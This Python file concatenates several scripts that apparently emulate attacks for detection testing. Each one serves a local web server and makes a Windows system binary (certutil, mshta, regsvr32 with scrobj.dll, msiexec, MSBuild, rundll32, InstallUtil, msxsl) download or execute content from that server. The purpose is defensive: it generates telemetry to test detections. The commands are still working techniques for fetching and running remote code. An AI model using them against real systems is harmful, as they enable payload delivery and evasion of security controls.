def main():
common.log("MsXsl Beacon")
server, ip, port = common.serve_web()
common.clear_web_cache()
new_callback = "http://%s:%d" % (ip, port)
common.log("Updating the callback to %s" % new_callback)
common.patch_regex(XSL_FILE, common.CALLBACK_REGEX, new_callback)
common.execute([MS_XSL, XML_FILE, XSL_FILE])
server.shutdown()
def main():
# http server will terminate on main thread exit
# if daemon is True
server, ip, port = common.serve_web()
uri = "bin/mydll.dll"
target_file = "mydll.dll"
common.clear_web_cache()
url = "http://{ip}:{port}/{uri}".format(ip=ip, port=port, uri=uri)
common.execute(["certutil.exe", "-urlcache", "-split", "-f", url, target_file])
server.shutdown()
common.remove_file(target_file)
def main():
# http server will terminate on main thread exit
# if daemon is True
common.log("MsHta Beacon")
server, ip, port = common.serve_web()
common.clear_web_cache()
new_callback = "http://%s:%d" % (ip, port)
common.log("Updating the callback to %s" % new_callback)
common.patch_regex(HTA_FILE, common.CALLBACK_REGEX, new_callback)
mshta = 'mshta.exe'
common.execute([mshta, HTA_FILE], timeout=10, kill=True)
server.shutdown()
def main():
common.log("RegSvr32 with .sct backdoor")
server, ip, port = common.serve_web()
common.clear_web_cache()
uri = 'bin/notepad.sct'
url = 'http://%s:%d/%s' % (ip, port, uri)
common.execute(
["regsvr32.exe", "/u", "/n", "/s",
"/i:%s" % url, "scrobj.dll"])
common.log("Killing all notepads to cleanup", "-")
common.execute(["taskkill", "/f", "/im", "notepad.exe"])
server.shutdown()
def main():
common.log("MsiExec HTTP Download")
server, ip, port = common.serve_web()
common.clear_web_cache()
common.execute([
"msiexec.exe", "/quiet", "/i",
"http://%s:%d/bin/Installer.msi" % (ip, port)
])
common.log("Cleanup", log_type="-")
common.execute([
"msiexec", "/quiet", "/uninstall",
"http://%s:%d/bin/Installer.msi" % (ip, port)
])
server.shutdown()
def main():
common.log("MsBuild Beacon")
server, ip, port = common.serve_web()
common.clear_web_cache()
common.log("Updating the callback http://%s:%d" % (ip, port))
target_task = "tmp-file.csproj"
common.copy_file(common.get_path("bin", "BadTasks.csproj"), target_task)
new_callback = "http://%s:%d" % (ip, port)
common.patch_regex(target_task, common.CALLBACK_REGEX, new_callback)
common.execute([MS_BUILD, target_task])
common.remove_file(target_task)
server.shutdown()
def main():
# http server will terminate on main thread exit
# if daemon is True
common.log("RunDLL32 with Script Object and Network Callback")
server, ip, port = common.serve_web()
callback = "http://%s:%d" % (ip, port)
common.clear_web_cache()
common.patch_regex(INF_FILE, common.CALLBACK_REGEX, callback)
rundll32 = "rundll32.exe"
dll_entrypoint = "setupapi.dll,InstallHinfSection"
common.execute(
[rundll32, dll_entrypoint, "DefaultInstall", "128", INF_FILE],
shell=False)
time.sleep(1)
common.log("Cleanup", log_type="-")
common.execute("taskkill /f /im notepad.exe")
server.shutdown()
def main():
server, ip, port = common.serve_web()
common.clear_web_cache()
target_app = "mydotnet.exe"
common.patch_file(MY_DOT_NET,
common.wchar(":8000"),
common.wchar(":%d" % port),
target_file=target_app)
install_util64 = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"
install_util86 = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe"
fallback = False
if os.path.exists(install_util64):
install_util = install_util64
elif os.path.exists(install_util86):
install_util = install_util86
else:
install_util = None
fallback = True
if not fallback:
common.clear_web_cache()
common.execute([
install_util, '/logfile=', '/LogToConsole=False', '/U', target_app
])
else:
common.log("Unable to find InstallUtil, creating temp file")
install_util = os.path.abspath("InstallUtil.exe")
common.copy_file(sys.executable, install_util)
common.execute([
install_util, "-c",
"import urllib; urllib.urlopen('http://%s:%d')" %
(common.LOCAL_IP, port)
])
common.remove_file(install_util)
common.remove_file(target_app)
server.shutdown()